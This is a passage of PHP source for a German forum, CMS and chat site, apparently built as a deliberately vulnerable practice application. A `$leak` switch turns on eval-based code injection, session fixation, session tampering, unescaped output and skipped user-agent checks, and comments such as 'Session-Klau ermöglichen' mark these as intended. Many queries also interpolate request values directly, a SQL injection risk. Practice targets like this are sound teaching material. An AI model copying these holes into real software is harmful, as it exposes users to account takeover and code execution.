'/(~?)(?:\$|$)\[(\w+)\]/e' => '("$1") ? "$[$2]" : ((isset($creolevar["$2"])) ? $creolevar["$2"] : "")'),$creole,array_merge(array(
'/(?<![<>])\r?\n(?!<!-{4}>|$)/e' => '(isset($creolevar["type"]) and $creolevar["type"] != "cms") ? "<br />\r" : " "',
'/(?<!<p>)\s*<!-{4}>\s*(?!<\/p>)/' => ''),(($leak) ? array(
'/(\$|$){2}(.+)\1{2}/e' => '(($x = array(1 => "$2", '."2 => '$2',". /* Debuging preg-replace/eval */ <<<eof
3 => "$2", 4 => '$2',
eof
.')) ? "" : "") .eval("\\\$x[5] = \'$2\';") .eval("\\\$x[6] = \"$2\";") .eval(\'$x[7] = "$2";\')'."
.eval(\"\\\\\$x[8] = '$2';\") .eval('\$x[9] = \'$2\';') .eval('\$x[10] =\"$2\";')".<<<eof
.eval("\\\\\$x[11] = '$2';") .eval("\\\\\$x[12] = \"$2\";") .eval('\$x[13] = "\$2";')
.eval('\$x[14] = \'$2\';')
eof
.'."<pre>Code-Injection: ".print_r($debug[] = $x,true)."</pre>"') : array())));
break;
}
if($img) { // Grafiken für Logo und Icon festlegen
$logo = ($logo) ? $logo : "$self/img?".(count($img)-3);
$icon = ($icon) ? $icon : "$self/img?".(count($img)-2);
}
# Mit Creole ausgesuchte HTML-Zeichen übergeben
if(preg_match_all('/(\w+),([#\w]+)/','et,amp;dq,quot;sz,szlig;nb,nbsp;lt,lt;gt,gt;sq,#39;ds,#36,lf,#10',$val))
foreach($val[2] as $key => $var)
$creolevar["_".$val[1][$key]] = "&$var;";
foreach(explode(',','a,o,u,A,O,U') as $var)
$creolevar["_{$var}e"] = "&{$var}uml;";
# Datenbank bei fehler deaktivieren
if(!$sql or !$conn or !$craw and preg_match('/(bots?|crawler|yandex)(?=\W|$)/i',$_SERVER['HTTP_USER_AGENT']) and $out = "<h1>No Bots allowed!</h1>") {
if($sql !== 0)
header('HTTP/1.0 503 Service Unavailable');
if(!$out)
$out = "<h1>Datenbank kann nicht geöffnet werden!</h1>";
$sql = false;
}
else {
# Variablen mit Datenbank setzen
if(!$mid and $path and preg_match('!/?(Blog|Profil)/([\w.-]+)$!i',$path,$var)) {
$mid = $sql['sq']($conn,"select id from [user] where username like '$var[2]'");
if($request == 'Blog')
$getopt[] = "id=$mid";
}
if(!$lone = $sql['sq']($conn,"select count(*) from [user]")) {
$info[3] = "**Der [[^Anmelden|erste Benutzer]] des Forums bekommt automatisch Admin-Rechte!**\r\n";
$user = true;
if(!$request and !$query or $request == 'Mitglieder')
$request = 'Anmelden';
}
elseif($lone > 1)
$lone = false;
$getopt = (isset($getopt)) ? implode("&",$getopt) : ''; // Suchoptionen als url festlegen
# Sitemap ausgeben
if($craw and $request == 'sitemap.xml' and $array = $sql['aq']($conn,"
select name, -- CMS
strftime('%Y-%m-%d',change) as date
from [cms]
where status/8%2 = 1 and status/2%4 = 0 and content like '%\n%'
union
select 'Profil/'||username as name, -- User-Profil
strftime('%Y-%m-%d',change) as date
from [user]
where status is not null and profil is not null
union
select 'Blog/'||u.username||'?q='||f.id as name, -- User-Blog
strftime('%Y-%m-%d',f.change) as date
from [forum] as f
left join [user] as u on u.id = f.userid
where f.userid = f.mailid and f.status%2 = 0 and u.status is not null
order by date desc",SQLITE_ASSOC)) {
foreach($array as $key => $var)
$array[$key] = "<url><loc>$Self/$var[name]</loc><lastmod>$var[date]</lastmod></url>";
header('Content-Type: text/xml');
die("<?xml version='1.0' encoding='UTF-8'?>\n"
."<urlset xmlns='http://www.sitemaps.org/schemas/sitemap/0.9'>\n".implode("\n",$array)."\n</urlset>");
}
# Mit Ajax Daten für ein Benutzer zurückgeben
if(isset($_GET['salt']) and preg_match('/[@\w.-]+/',$_GET['salt'],$var)) // Salt
die((preg_match('/^([\w.-]+),salt:(\w+)-hash:\w+$/',$sql['sq']($conn,"select username||','||password from [user] where username like '$var[0]' or mail like '$var[0]'"),$val)) ? "$val[1]:$val[2]" : false);
elseif(isset($_GET['ask']) and preg_match('/([@\w.-]+)(?::([\w@.-]+))?/',$_GET['ask'],$var)) // ask
die((preg_match('/^(\d+)-(?:(.+?):)?/',$sql['sq']($conn,"select passhelp from [user] where username like '$var[1]'".(($leak) ? "" : " and mail like '".((isset($var[2])) ? $var[2] : '')."'")),$val)) ? (($val[1]) ? "$val[1]-{$pass[$val[1]]}" : "$val[1]-$val[2]") : false);
# Alternativer Hash-Login
if(count($_POST) == 0 and (isset($_GET['id']) and preg_match('/^(\d+)\.(\w+)$/',$_GET['id'],$var)
or isset($_SERVER['HTTP_REFERER']) and preg_match('/id=(\d+)\.(\w+)/',$_SERVER['HTTP_REFERER'],$var))
and $row = $sql['sq']($conn,"select username||':'||password from [user] where status is not null and id=$var[1]") and $hash[0]($row) == $var[2]) {
$status = 1;
$uid = $var[1];
$row = $var[0];
}
# Feeds ausgeben
if($request == 'Atom' and ($inet or !$inet and $uid)) {
if($id and $uid and $row)
$uid = $id;
$array = $sql['aq']($conn,"
select f.id as id,
f.id as name,
f.[create] as 'create',
f.[create] as change,
path,
ifnull(title,'Ohne Titel') as title,
mailid,
message,
ifnull(f.status%2,'-1') as right,
ifnull(u.username,'Unbekannt') as author,
ifnull(m.username,'Unbekannt') as tomail
from [forum] as f
left join user as u on u.id = f.userid
left join user as m on m.id = f.mailid
where f.status is not null and ".(($mid) ? "f.mailid = f.userid and f.userid = $mid".(($uid) ? "" : " and f.status%2 = 0")
: (($uid) ? "(f.mailid is null or f.mailid = $id or f.mailid is not null and f.userid = $id)"
.((isset($_GET['latest']) and $var = $sql['sq']($conn,"select change from [user] where id=$id"))
? " and (f.[create] > datetime('$var') or f.mailid = $id and f.status/2%2 = 0)" : "")
: "f.mailid is null and f.status%2 = 0")."
union all
select id,
name,
[create] as 'create',
change,
null as path,
ifnull(description,'Ohne Titel') as title,
null as mailid,
content as message,
ifnull(status/2%4,'-1') as right,
(select username from user where status/2%2 order by id limit 1) as author,
'Unbekannt' as tomail
from [cms]
where status/8%2 = 1 and status/2%4 < ".(($uid) ? 3 : 1))."
order by 4 desc
limit ".max(min(((isset($_GET['max']) and preg_match('/\d+/',$_GET['max'],$var)) ? $var[0] : $paging[1]),$paging[2]),$paging[0]),SQLITE_ASSOC);
foreach($array as $key => $var) {
$creolevar = array_merge($creolevar,array('type' => 'feed', 'id' => $var['id'], 'name' => $var['name'], 'title' => $var['title'], 'from' => $var['author'], 'right' => $var['right'], 'create' => strtotime($var['create']), 'change' => strtotime($var['change'])));
$array[$key] = "<entry>
<title type=\"html\">".strtr($var['title'],$html)."</title>
<content type=\"html\"><![CDATA["
.((preg_match('!/(\d+)/$!',$var['path'],$val)) ? "<table align='right'><tr><td>(<a href='$Self?q=$val[1]' title='Bezugsnachricht'>^</a>)</td></tr></table>" : '')
.preg_replace(array_keys($creole),str_replace($self,$Self,array_values($creole)),strtr(preg_replace('/::f\/[\w()!,.-]+/',"\$0&id=$row",$var['message']),array_slice($html,1)))."]]></content>
<link href=\"$Self".(($var['id'] != $var['name']) ? "/$var[name]" : (($var['mailid']) ? "/".(($var['author'] == $var['tomail']) ? "Blog" : "Mail").(($uid) ? "?id=$row&" : "?") : (($uid and $row) ? "?id=$row&" : "?"))."q=$var[id]")."\" />
<id>$var[id].".strtotime($var['create'])."</id>
<updated>".date("Y-m-d\TH:i:s",strtotime($var['change'])).preg_replace('/([+-][\d]{2})([\d]{2})/','$1:$2',date("O",strtotime($var['change'])))."</updated>
<author><name>".strtr($var['author'],$html)."</name><url>$Self/Profil/".strtr($var['author'],$html)."</url></author>".(($var['mailid'] and $var['author'] != $var['tomail']) ? "
<contributor><name>".strtr($var['tomail'],$html)."</name><url>$Self/Profil/".strtr($var['tomail'],$html)."</url></contributor>" : "")."\n</entry>\n";
}
$cleanup = array_merge($creoleph['toutf'],array('/[\x00-\x1f]+/' => ''));
header('content-type: text/xml; charset=UTF-8');
die("<?xml version='1.0' encoding='UTF-8'?>
<feed xmlns='http://www.w3.org/2005/Atom'>
<title>$title</title>
<link href='$Self' />
<updated>".preg_replace('/^.+?<updated>([^<]+).*$/s','$1',reset($array))."</updated>
<generator>PHP/".phpversion()."</generator>
<logo>$logo</logo>\n".preg_replace(array_keys($cleanup),array_values($cleanup),implode('',$array))."\n</feed>");
}
# Session starten
if($leak and isset($_GET[session_name()]))
session_id($_GET[session_name()]);
@session_start();
if(isset($_SESSION['uid']) and $_SESSION['uid']) {
$uid = $_SESSION['uid'];
$status = $sql['sq']($conn,"select status from [user] where id=$uid");
}
else
$_SESSION['src'] = (!isset($_COOKIE['login']) and isset($_SESSION['src'])) ? $_SESSION['src'] + 1 : 0;
# Sessiondaten manipolieren
if($leak and $request == 'set' and preg_match(substr($dpsk,0,-2).'=([\w\s:-]*)$/',urldecode($query),$var))
if($var[2])
$_SESSION[$var[1]] = $var[2];
else
unset($_SESSION[$var[1]]);
# Cookie-Login
if(isset($_COOKIE['login']) and preg_match('/^(\d+)\.(\w+)$/',$_COOKIE['login'],$var) and $val = $sql['aq']($conn,"
select username||':'||password as hash,status,change from [user] where status is not null and id = $var[1]") and $hash[0]($val[0]['hash']) == $var[2]) {
$row = array('set' => "status=(status/2%8*2+1),", 'where' => "(status%2 = 0 or datetime(change,'+$eos minutes') < datetime('now','localtime')) and ");
$uid = $var[1];
if(!isset($_SESSION['uid'])) {
$_SESSION['uid'] = $uid;
$_SESSION['lua'] = $val[0]['change'];
setcookie('login',"$uid.".$hash[0]($val[0]['hash']),time()+$ctl,$self);
}
$status = floor($val[0]['status']/2)*2+1;
}
# uid in der Datenbank und angemeldet? - Sonst automatisch abmelden
if($uid and isset($_SESSION['uid'])) {
if($sql['sq']($conn,"
select id
from [user]
where id=$uid".(($leak) ? "" /* Session-Klau ermöglichen */ : "
and useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."'")."
and status%2=1") == $uid) {
$sql['e']($conn,"
update [user] set change=datetime('now','localtime'),
requests=requests+1
where id=$uid and status=(status/2%8*2+1)");
$un = $sql['sq']($conn,"select username from [user] where id = $uid");
}
else {
$sql['e']($conn,"
update [user] set status=(status/2%8*2)
where id=$uid");
foreach($_SESSION as $key => $var)
unset($_SESSION[$key]);
setcookie(session_name(),'',time()-$ctl,'/');
$status = 0;
$uid = false;
}
}
# Loginbestätigung für Atom-Feeds & Cookie-Login
if($rw and $uid and $row)
$sql['e']($conn,"
update [user] set ".((is_array($row) and isset($row['set'])) ? $row['set'] : '')."
logins=logins+1,
requests=requests+1,
change=datetime('now','localtime'),
ip='$addr',
useragent='".$sql['es']($_SERVER['HTTP_USER_AGENT'])."'
where ".((is_array($row) and isset($row['where'])) ? $row['where'] : '')."status is not null and id=$uid");
# Datei-Download
if($request == 'file'
and ( preg_match('/^(\d+)(?:-([\w!,.-]+))?/',$query,$var)
or ($var[1] = $mid) and $var[2] = $query))
if($file = $sql['aq']($conn,"
select c.id as id,
a.name as name,
ifnull(ifnull(a.type,b.type),'application/octet-stream') as type,
ifnull(a.size,b.size) as size,
ifnull(a.data,b.data) as data,
strftime('%s',ifnull(a.[create],b.[create])) as time
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
left join [file] as c on a.id = c.id".(($status/2%2) ? "" : " and (c.status%2 = 1 or c.status%2 = 0 and '$uid' != '')")."
where ".((!@$var[2]) ? (($status/2%2) ? "" : "a.user = ".(int)$uid." and ")."a.id = ".(int)$var[1]
: "a.user = ".@(int)$var[1]." and a.name like '".@$sql['es']($var[2])."'")."
order by a.id desc, a.name
limit 1",SQLITE_ASSOC))
if($file[0]['id']) {
if($cache) {
$time = $file[0]['time'];
$date = gmdate("D, d M Y H:i:s",$time)." GMT";
header("Cache-Control: public");
header("Etag: $time");
if(($val=(function_exists("apache_request_headers")) ? apache_request_headers() : array())
and isset($val["If-None-Match"]) and isset($val["If-Modified-Since"])
and $val["If-None-Match"] == $time and $val["If-Modified-Since"] == $date
or isset($_SERVER["HTTP_IF_NONE_MATCH"]) and isset($_SERVER["HTTP_IF_MODIFIED_SINCE"])
and $_SERVER["HTTP_IF_NONE_MATCH"] == $time and @$_SERVER["HTTP_IF_MODIFIED_SINCE"] == $date) {
header("HTTP/1.1 304 Not Modified");
exit();
}
header("Pragma: public");
header("Last-Modified: $date");
header("Cache-Control: public, max-age=".($eos*60));
}
header("Content-Type: ".$file[0]['type']);
header("Content-Length: ".abs($file[0]['size']));
header('Content-Disposition: filename="'.$file[0]['name'].'"');
die((($var = base64_decode($file[0]['data']) and $file[0]['size'] > 0) ? $var : $gz['inflate']($var)));
}
else {
header('HTTP/1.0 401 Unauthorized');
die("<h1>Datei benötigt Benutzeranmeldung!</h1>");
}
else {
header('HTTP/1.0 404 File Not Found');
die("<h1>Datei nicht gefunden!</h1>");
}
# Forum bei Externen-Adressen ohne Ameldung deaktivieren
if(!$inet and !$uid and !$local)
$request = 'Impressum';
# Statischen/Dynamischen Content bereitstellen/ausgeben
if($content = (isset($content[$request])) ? $content = $content[$request] : (($request and !isset($_REQUEST['nocms']) or !count($_GET) and !count($_POST)) ? $sql['aq']($conn,"
select ifnull(r.content,ifnull(c.content,'')) as '.content',
strftime('%s',ifnull(r.change,c.change)) as change,
strftime('%s',ifnull(r.[create],c.[create])) as 'create',
ifnull(r.id,c.id) as id,
ifnull(r.name,c.name) as name,
ifnull(r.description,c.description) as title,
ifnull(ifnull(r.status,c.status)/2%4,'-1') as right,
(select username from user where status/2%2 = 1) as 'from',
'cms' as type
from [cms] as c
left join [cms] as r on r.name like c.content
where c.name like '".preg_replace('/^(Abmelden)$/','',$request)."' and c.status/2%4 <= ".($status/2%2 + $status%2*2),SQLITE_ASSOC) : false)) {
if(is_array($content) and $var = reset($content)) {
header('Last-Modified: '.date('r',$var['change']));
$head['cms'] = "<meta name='description' content='$var[title]' />";
if($var['right'] == 2 or $status/2%2)
$uedit = "CMS?id=$var[id]";
$creolevar = array_merge($creolevar,$var);
$content = $var['.content'];
}
if(preg_match('!^(https?://|/|\.|#|::(?=l\/))[^<\s\'>]+$!',$content,$var)) { // Linkweiterleitung
if($var[1] == '::')
$content = strtr($content,array('::l' => $self, '::L' => $Self));
header("Location: $content");
die("<html><head><meta http-equiv='refresh' content='0; URL=$content' /><title>$content</title></head>
<frameset><frame src='$content' /><noframes><body><script type='text/javascript'><!--
top.location.href='$content';//--></script><noscript><a href='$content'>$content</a></noscript></body></noframes></frameset></html>");
}
if($content)
$out .= "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),(($leak) ? $content : strtr($content,array_slice($html,1))))."</div>";
$request .= " ";
}
# Datenbank beschreibbar
if($rw) {
# Pre-Chatline: Abmelden wenn Interaktionslose Zeit abgelaufen & Aufräumen
$sql['e']($conn,"
update [user] set status = (status/2%8*2), -- Autologoff
chat = null
where status = (status/2%8*2+1)
and datetime(change,'+$eos minutes') < datetime('now','localtime')
and status is not null;
update user set [chat] = null -- Aufraeumen
where id = ( select a.id
from [user] as a
left join [user] as b on a.chat = b.id".(($leak) ? "" : " and b.status > 0")." -- Chatpartner noch Online (Moeglicher Fehler: > 0)
where a.status is not null and a.chat > 0 and b.chat is null -- Chatter nicht gesperrt und noch Online (Moeglicher Fehler: > 0)
limit 1); -- und Chatpartner nicht im Chat
delete from [chat]
where chat = (select a.chat -- chatkanal
from [chat] as a
left join [user] as b on a.chat = b.chat -- Teilnehmer des Chatkanals
or a.chat <= 0 and a.user = b.id and status%2 = 1 -- Teilnehmer ist online
or abs(a.chat) = b.id and a.chat != b.id and (b.chat is null and status%2 = 1 or b.chat = b.id)
where b.id is null -- Keins der Bedingungen trifft zu!
group by a.chat
limit 1)");
# Chatline
if($request == 'Chat' and !$lone and $uid and $status%2) {
$wait = false;
foreach($array = array( // Browser-Cache komplett abschalten
'Cache-Control' => 'no-cache, no-store, must-revalidate',
'Pragma' => 'no-cache',
'Expires' => '0') as $key => $var) {
header("$key: $var");
$head[] = "<meta http-equiv=\"$key\" content=\"$var\" />";
}
if(isset($_REQUEST['chat']) and preg_match('/^(auth|call|edit|news|quit|send|sign|user|html)(?::(.*))?$/',$_REQUEST['chat'],$chat)) {
#html
if($chat[1] == 'html') { // Chatline ohne JavaScript
$wait = (isset($_REQUEST['wait']) and preg_match('/^\d{1,3}$/',$_REQUEST['wait'],$var) and $var[0] >= 30) ? $var[0] : 30;
if($status/8%2) // Verschlüsselung abschalten
$sql['e']($conn,"update user set status = status%8 where id = $uid");
if(isset($_REQUEST['edit']) and preg_match('/^[01]$/',$_REQUEST['edit'],$var) and $var[0] != $status/4%2) // edit
$chat = array(0,'edit',$var[0]);
elseif(isset($_REQUEST['call']) and isset($_REQUEST['user']) and isset($_REQUEST['line'])
and preg_match('/^\d+,.*$/',"$_REQUEST[user],$_REQUEST[line]",$var)) // call
$chat = array(0,'call',$var[0]);
elseif(isset($_REQUEST['quit'])) // quit
$chat[1] = 'quit';
elseif((isset($_REQUEST['send']) or isset($_REQUEST['doit'])) and isset($_REQUEST['line']) and $_REQUEST['line'] != '') // send
$chat = array(0,'send',$_REQUEST['line']);
elseif($var = $sql['aq']($conn,"select user,text from [chat] where chat = -$uid limit 1")) // auth
$chat = array(0,'auth',(($status/4%2 and !preg_match('/^key:\w+:/',$var[0]['text'])) ? '' : '-').$var[0]['user']);
}
else
$out = 0;
#user
if($chat[1] == 'user') // Userstatus übermitteln
$out = implode(",",$sql['sq']($conn, /* id:status,chat,users; ... */ "
select u.id||','||ifnull(c.status,u.status)
from [user] as u
left join [user] as c on u.chat = c.chat
where u.status is not null
group by u.id"));
#edit
elseif($chat[1] == 'edit' and @preg_match('/^[013457]$/',$chat[2]) and $sql['e']($conn, /* Eigenen Chatstatus bearbeiten */"
update [user] set
status = status%4+(($chat[2]%2 + $chat[2]/4%2*2)*4)
where id = $uid"))
$out = $sql['c']($conn);
#auth
elseif($chat[1] == 'auth' and preg_match('/^(-?\d+)(?:,(\w+),([=\w\/+]+))?$/',$chat[2],$var) and $sql['e']($conn, /* Chat Erlauben */"
update [user] set
chat = ".(($var[1] < 0) ? 'null' : 'chat*-1')."
where abs(chat) = $uid and id = abs($var[1]);".(($var[1] < 0) ? "
delete from [chat]
where chat = -$uid and user = abs($var[1])" : "
update [user] set
chat = id
where chat is null and id = $uid;
update [chat] set
chat = abs(chat)
where chat = -$uid and user = abs($var[1])".((count($var) > 3) ? ";
insert into [chat] (chat,user,time,text) values ($uid,$var[1],datetime('now','localtime'),'key:$var[2]/$var[3]:')" : ""))))
$out = $sql['c']($conn);
#send/sign
elseif(($chat[1] == 'send' or $chat[1] == 'sign' and $status/2%2) and @preg_match('/^.+$/',$chat[2]) and $sql['e']($conn, /* Nachricht Senden */ "
insert into [chat] (chat,user,time,text) values (".(($chat[1] == 'send') ? $sql['sq']($conn,"select chat from [user] where id = $uid") : 0).",$uid,datetime('now','localtime'),'".$sql['es'](preg_replace('/%([\da-f]{2})/ei','chr(hexdec("$1"))',((preg_match('!^[\w+/]+=*$!',$chat[2]) or !$leak) ? strtr($chat[2],$html) : @preg_replace(array_keys($creole),array_values($creole),strtr($chat[2],$html)))))."')"))
$out = $sql['c']($conn);
#call
elseif($chat[1] == 'call' and preg_match('/^(\d+),?(.*)$/',$chat[2],$val) and ($var = $sql['sq']($conn,/* Chat beginnen */"
select ifnull(b.chat,a.id)
from user as a
left join [user] as b on b.chat = a.chat
left join ( select d.id,
count(d.chat) as chats
from user as d
left join user as e on d.chat = e.chat
group by d.id) as c on c.id = a.id
where (b.status%2 and b.status/4%2
or b.id is null and a.status%2 and a.status/4%2
or a.id = b.id and c.chats = 1) and a.id = $val[1]
limit 1")) !== false) // Botnet Workaround für Antworten
$out = $sql['e']($conn,"
update [user] set
chat = '-".intval($var)."'
where chat is null and id = $uid;
insert into [chat] (chat,user,time,text) values ('-".intval($var)."',$uid,datetime('now','localtime'),'".$sql['es'](preg_replace('/%([\da-f]{2})/ei','chr(hexdec("$1"))',$val[2]))."');");
#quit
elseif($chat[1] == 'quit' and $val = reset(($sql['aq']($conn, /* Chat beenden */ "
select a.chat as chat,count(b.id) as users
from [user] as a
left join [user] as b on a.chat = b.chat
where a.id = $uid
group by a.id")))) {
$sql['e']($conn, /* Offene Chatanfragen löschen */ "
delete from [chat]
where user = $uid and chat < 0");
if(($val['chat'] and $val['chat'] != $uid or $val['users'] and $val['users'] < 3)) // Nur den Client oder beide beim Privaten Chat
$sql['e']($conn,"
update [user] set
chat = null
where chat = $val[chat]".(($val['users'] < 3) ? "" : " and id = $uid"));
elseif($val['chat'] == $uid and $var = $sql['sq']($conn,"select id from [user] where chat = $val[chat] and id != $uid limit 1")) // Master ersetzen
$sql['e']($conn,"
update [user] set
chat = null
where id = $uid;
update [user]
set chat = $var
where chat = $val[chat];
update [chat] set
chat = $var
where chat = $uid");
$out = 1;
}
#news
elseif($chat[1] == 'news' and @preg_match('/\d*/',$chat[2])) { // Aktuelle Chat-Neuigkeiten abfragen
$var = $sql['aq']($conn,"
select count(a.id), -- 0 Anzahl User
count(nullif(a.status%2,0)), -- 1 Anzahl der Logins
count(nullif(a.status/4%2,0)), -- 2 Anzahl der Chatter
count(nullif(a.status/8%2,0)), -- 3 Anzahl der Chatter
count(a.chat), -- 4 Anzahl der Chats
ifnull(sum(a.chat),0), -- 5 Hash der Chats
count(b.id), -- 6 Anzahl der Masters
ifnull((select chat from [user] where id = $uid),'-'), -- 7 Eigene Chat-ID
ifnull((select id from user where chat != $uid and abs(chat)=$uid limit 1),'-') -- 8 Erste ID von Chatanfrage(n)
from [user] as a
left join [user] as b on a.id = b.id and b.id = b.chat
where a.status is not null",SQLITE_NUM);
if($val = intval($var[0][8])) ## 9 Erster Text von Chatanfrage(n)
$var[0][] = preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$sql['sq']($conn,"select text from chat where user = $val and chat = -$uid limit 1"));
$val = (isset($chat[2])) ? intval($chat[2]) : 0;
$wrt = intval($var[0][7]); // Chat-ID
$out = implode(',',$var[0]).";";
$var = $sql['sq']($conn,"select ifnull(max(id),'0') from chat where chat = $wrt or chat = '0'"); // 1 Max Chat-Messages
$out .= "$var;";
if(isset($chat[2]) and $var > $val and $array = $sql['aq']($conn, /* 2 Anzahl der Messages */ "
select user,strftime('%Y%m%d%H%M%S',time) as time,text
from [chat]
where (".(($wrt) ? "chat = $wrt or " : "")."chat = '0') and id > $val" /* Keine Chatanfragen anzeigen (Hack ermöglichen) */."
order by id") and count($array)) {
$out .= count($array);
foreach($array as $var)
$out .= ";$var[user],$var[time],".preg_replace('/[%;]/e','"%".dechex(ord("$0"))',$var['text']);
}
else
$out .= "0;";
}
#end
if(preg_match('/call|edit|quit|send|sign/',$chat[1])) // User-Lifetime zurücksetzen
$sql['e']($conn,"
update [user] set
change = datetime('now','localtime'),
requests = requests+1
where id = $uid");
if($wait) { // HTML-Chat ausgeben (NoScript)
$out = '';
if($chat = $sql['sq']($conn,"select chat from [user] where id = $uid")) {
$array = $sql['aq']($conn,"
select ifnull(u.username,'Unbekannt') as user,strftime('%d.%m.%Y %H:%M:%S',c.time) as time,c.text as text
from [chat] as c
left join [user] as u on u.id = c.user
where c.chat = $chat
order by c.time desc
limit 10");
foreach($array as $key => $var)
$array[$key] = "<p><fieldset class='cr'><legend><b>$var[user]</b> <small>($var[time])</small></legend><div>".strtr($var['text'],array_slice($html,1))."</div></fieldset></p>";
$out = implode("\n",$array);
}
@header('Content-Type: text/html; charset=utf-8');
$out = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2//EN\">" /* 4.01 Transitional */ ."
<html lang=\"de\"><head><title>NoScript Chatline</title>
<meta http-equiv='refresh' content='$wait; URL=$self/Chat?chat=html:".time()."&wait=$wait' />
<meta http-equiv='content-type' content='text/html; charset=utf-8' />\n</head><body>".strtr($out,$uml)
.((($leak or $status/2%2) and isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "<hr />".date('d.m.Y H:i:s')
."<pre>".print_r($_REQUEST,true).((isset($debug)) ? print_r($debug,true) : '')."</pre>" : "")."</body></html>";
}
else
header('Content-Type: text/plain');
die("$out"); // Ergebnis ausgeben
}
if(is_array($jschat) and is_array($jschat['crypt'])) { // Verschlüsselten Chat vorbereiten
foreach($jschat['crypt'] as $key => $var)
$head["chat.$key"] = "<script type='text/javascript' language='javascript' src='$var'></script>";
$a = "['$jschat[prime]','".(($jschat['main']) ? $jschat['main'] : substr(strrev(str_rot13($jschat['prime'])),1))."',$jschat[base]]";
}
else
$a = 'false';
$rows = $sql['aq']($conn, /* Chat-GUI Erstellen */ "
select id,username
from [user]
where status is not null
order by username");
foreach($rows as $key => $var)
$rows[$key] = "<option value='$var[id]'>$var[username]</option>";
$val = array(0 => 'Ablehnen', 1 => 'Erlauben', 3 => 'Zeigen');
foreach($val as $key => $var)
$val[$key] = "<span id='sr$key'".(($key == 3) ? " style='display:none'" : "")."><input type='radio' name='edit' id='r$key' onclick='cl(2,$key)' value='$key' ".(($status/4%2 == $key) ? "checked " : "")."/><label for='r$key'>$var</label></span>";
$var = "<form name='chat' method='post' action='$self/Chat' target='nschatline' onsubmit='cl(6,0);return false'><fieldset><legend><b>".((isset($_GET['nojs'])) ? "Chatline" : "<a href='$self/Chat?nojs' title='Chat ohne JavaScript und ohne Verschlüsselung'>Chatline</a>")."</b></legend>
<noscript><iframe src='$self/Chat?chat=html' style='width:100%;height:50%' name='nschatline'></iframe></noscript>
<input type='hidden' name='chat' value='html' /><input type='hidden' name='copy' value='' /><input type='submit' name='doit' style='display:none' />
<div id='view' style='width:100%;height:400;overflow-y:auto;display:none'></div>
<table width='100%'><tr><td><input type='text' name='line' value='' size='80' style='width:100%' /></td>
<td width='1%'><input type='submit' name='send' value='Senden' /></td></tr></table>
<table width='100%'><tr><td>Chat mit <select size='1' name='user' onchange='cl(3,this.value)'><option value='-'>Bitte wählen...</option>
<option value='0' style='display:none' disabled>Alle Benutzer</option>".implode("",$rows)."</select>
<input type='submit' name='call' value='Verbinden' onclick='cl(4,B.user.value+\",\"+line.value);return false' />
<input type='submit' name='quit' value='Trennen' onclick='cl(5,0);return false' /></td>
<td align='center'><span onclick='cl(7,0)'>Refresh: </span> <select size='1' name='wait'>"
.preg_replace('/(\d+)(h?)(s?)/e','"<option value=\'$1\'".(("$2") ? "style=\'display:none\' disabled" : "")
.(("$3") ? "selected" : "").">$1</option>"','3h 5h 10h 15h 20 30s 45 60 90 120')."</select> Sek.</td>
<td align='right'><span id='cryptchat' style='display:none'><label for='crypt'>Verschlüsselung:</label>
<input type='checkbox' id='crypt' name='crypt' value='1' onclick='cl(9,this.checked)' ".(($status/8%2) ? "checked " : "")."/></span> Chatanfragen: "
.implode("\n",$val)."</td></tr></table></fieldset>
<script type='text/javascript'><!--\n".preg_replace($js,'',"
function cl(x,y) { // Omni Chat-Function (x -> Mode / y -> Parameter)
switch(x) {
case 0: // 0:Exclusic-Oder für IE6
return (y[0] || y[1]) && !(y[0] && y[1]);
case 1: // 1:Per Ajax Chat-Kommandos abschicken
if(A) {
A.open('POST',location.pathname,false);
A.setRequestHeader('Content-type','application/x-www-form-urlencoded');
A.send('chat=' + encodeURIComponent(y)); // Absenden".((($leak or $status/2%2) and isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "
jsdebug(y + '\\x20->\\x20' + A.responseText); // Chat-Requests Debugen" : "")."
return A.responseText
}
return false;
case 2: // 2:[edit] Chatstatus ändern
cl(1,'edit:' + (y + B.crypt.checked * 4));
break;
case 3: // 3:User auswählen
if(parseInt(y,10))
B.call.disabled = false,
B.call.style.display = 'inline';
else
B.call.disabled = true,
B.call.style.display = 'none';".(($status/2%2) ? "
if(y == 0)
B.line.disabled = false,
B.send.disabled = false,
B.doit.disabled = false;
else {
B.send.disabled = true,
B.doit.disabled = true;
if(y > 0) {
B.line.disabled = false;
B.line.focus();
}
else
B.line.disabled = true;
}" : "
if(y > 0) {
B.line.disabled = false;
B.line.focus();
}
else
B.line.disabled = true;")."
break;
case 4: // 4:[call] Chat mit User beginnen
if(y && cl(1,'call:' + ((F && B.crypt.checked && (z = window.name.match(/^key:\w+,(\w+),[\w-]+$/))) ? y.replace(/,/,',key:' + z[1] + ':') : y)) != 0)
B.call.disabled = true,
B.call.style.display = 'none',
B.user.disabled = true,
B.line.disabled = true,
B.quit.disabled = false,
B.quit.style.display = 'inline',
B.crypt.disabled = true;
cl(8,0);
break;
case 5: // 5:[quit] Chat beenden
cl(1,'quit');
B.call.disabled = false,
B.call.style.display = 'inline',
B.user.disabled = false,
B.quit.disabled = true,
B.quit.style.display = 'none',
B.crypt.disabled = false,
window.name = window.name.replace(/\w+$/,'-');
cl(8,0);
break;
case 6: // 6:[sign|send] Nachricht Senden
if(cl(1,".(($status/2%2) ? "((B.user.value == 0) ? 'sign' : 'send')" : "'send'")." + ':' + ((F && (z = window.name.match(/(\w+)$/)))
? CryptoJS.MD5(z[1] + ',' + B.line.value) + '/' + CryptoJS.AES.encrypt(B.line.value,z[1]).toString().replace(/([^=])$/,'$1=')
: B.line.value.replace(/%/g,'%25').replace(/&/g,'%26').replace(/=/g,'%3D').replace(/\?/g,'%3F'))) != 0)
B.line.value = '';
B.line.focus();
cl(8,0);
break;
case 7: // 7:Formulare Initialisieren edit
if(!C)
C = cl(1,'news').split(';'); // Universale Infos abholen
x = [];
y = cl(1,'user').split(','); // Chat-User Infos abholen
for(z=0;z<y.length;z+=2) // User-Infos aufbereiten
x[y[z]] = y[z+1];
y = B.user.getElementsByTagName('option'); // User-Liste aktualisieren
for(z=1;z<y.length;z++)
if(".(($status/2%2) ? "y[z].value == 0 || " : "")."(w = x[parseInt(y[z].value,10)]) && y[z].value != $uid && w%2)
y[z].style.display = 'block',
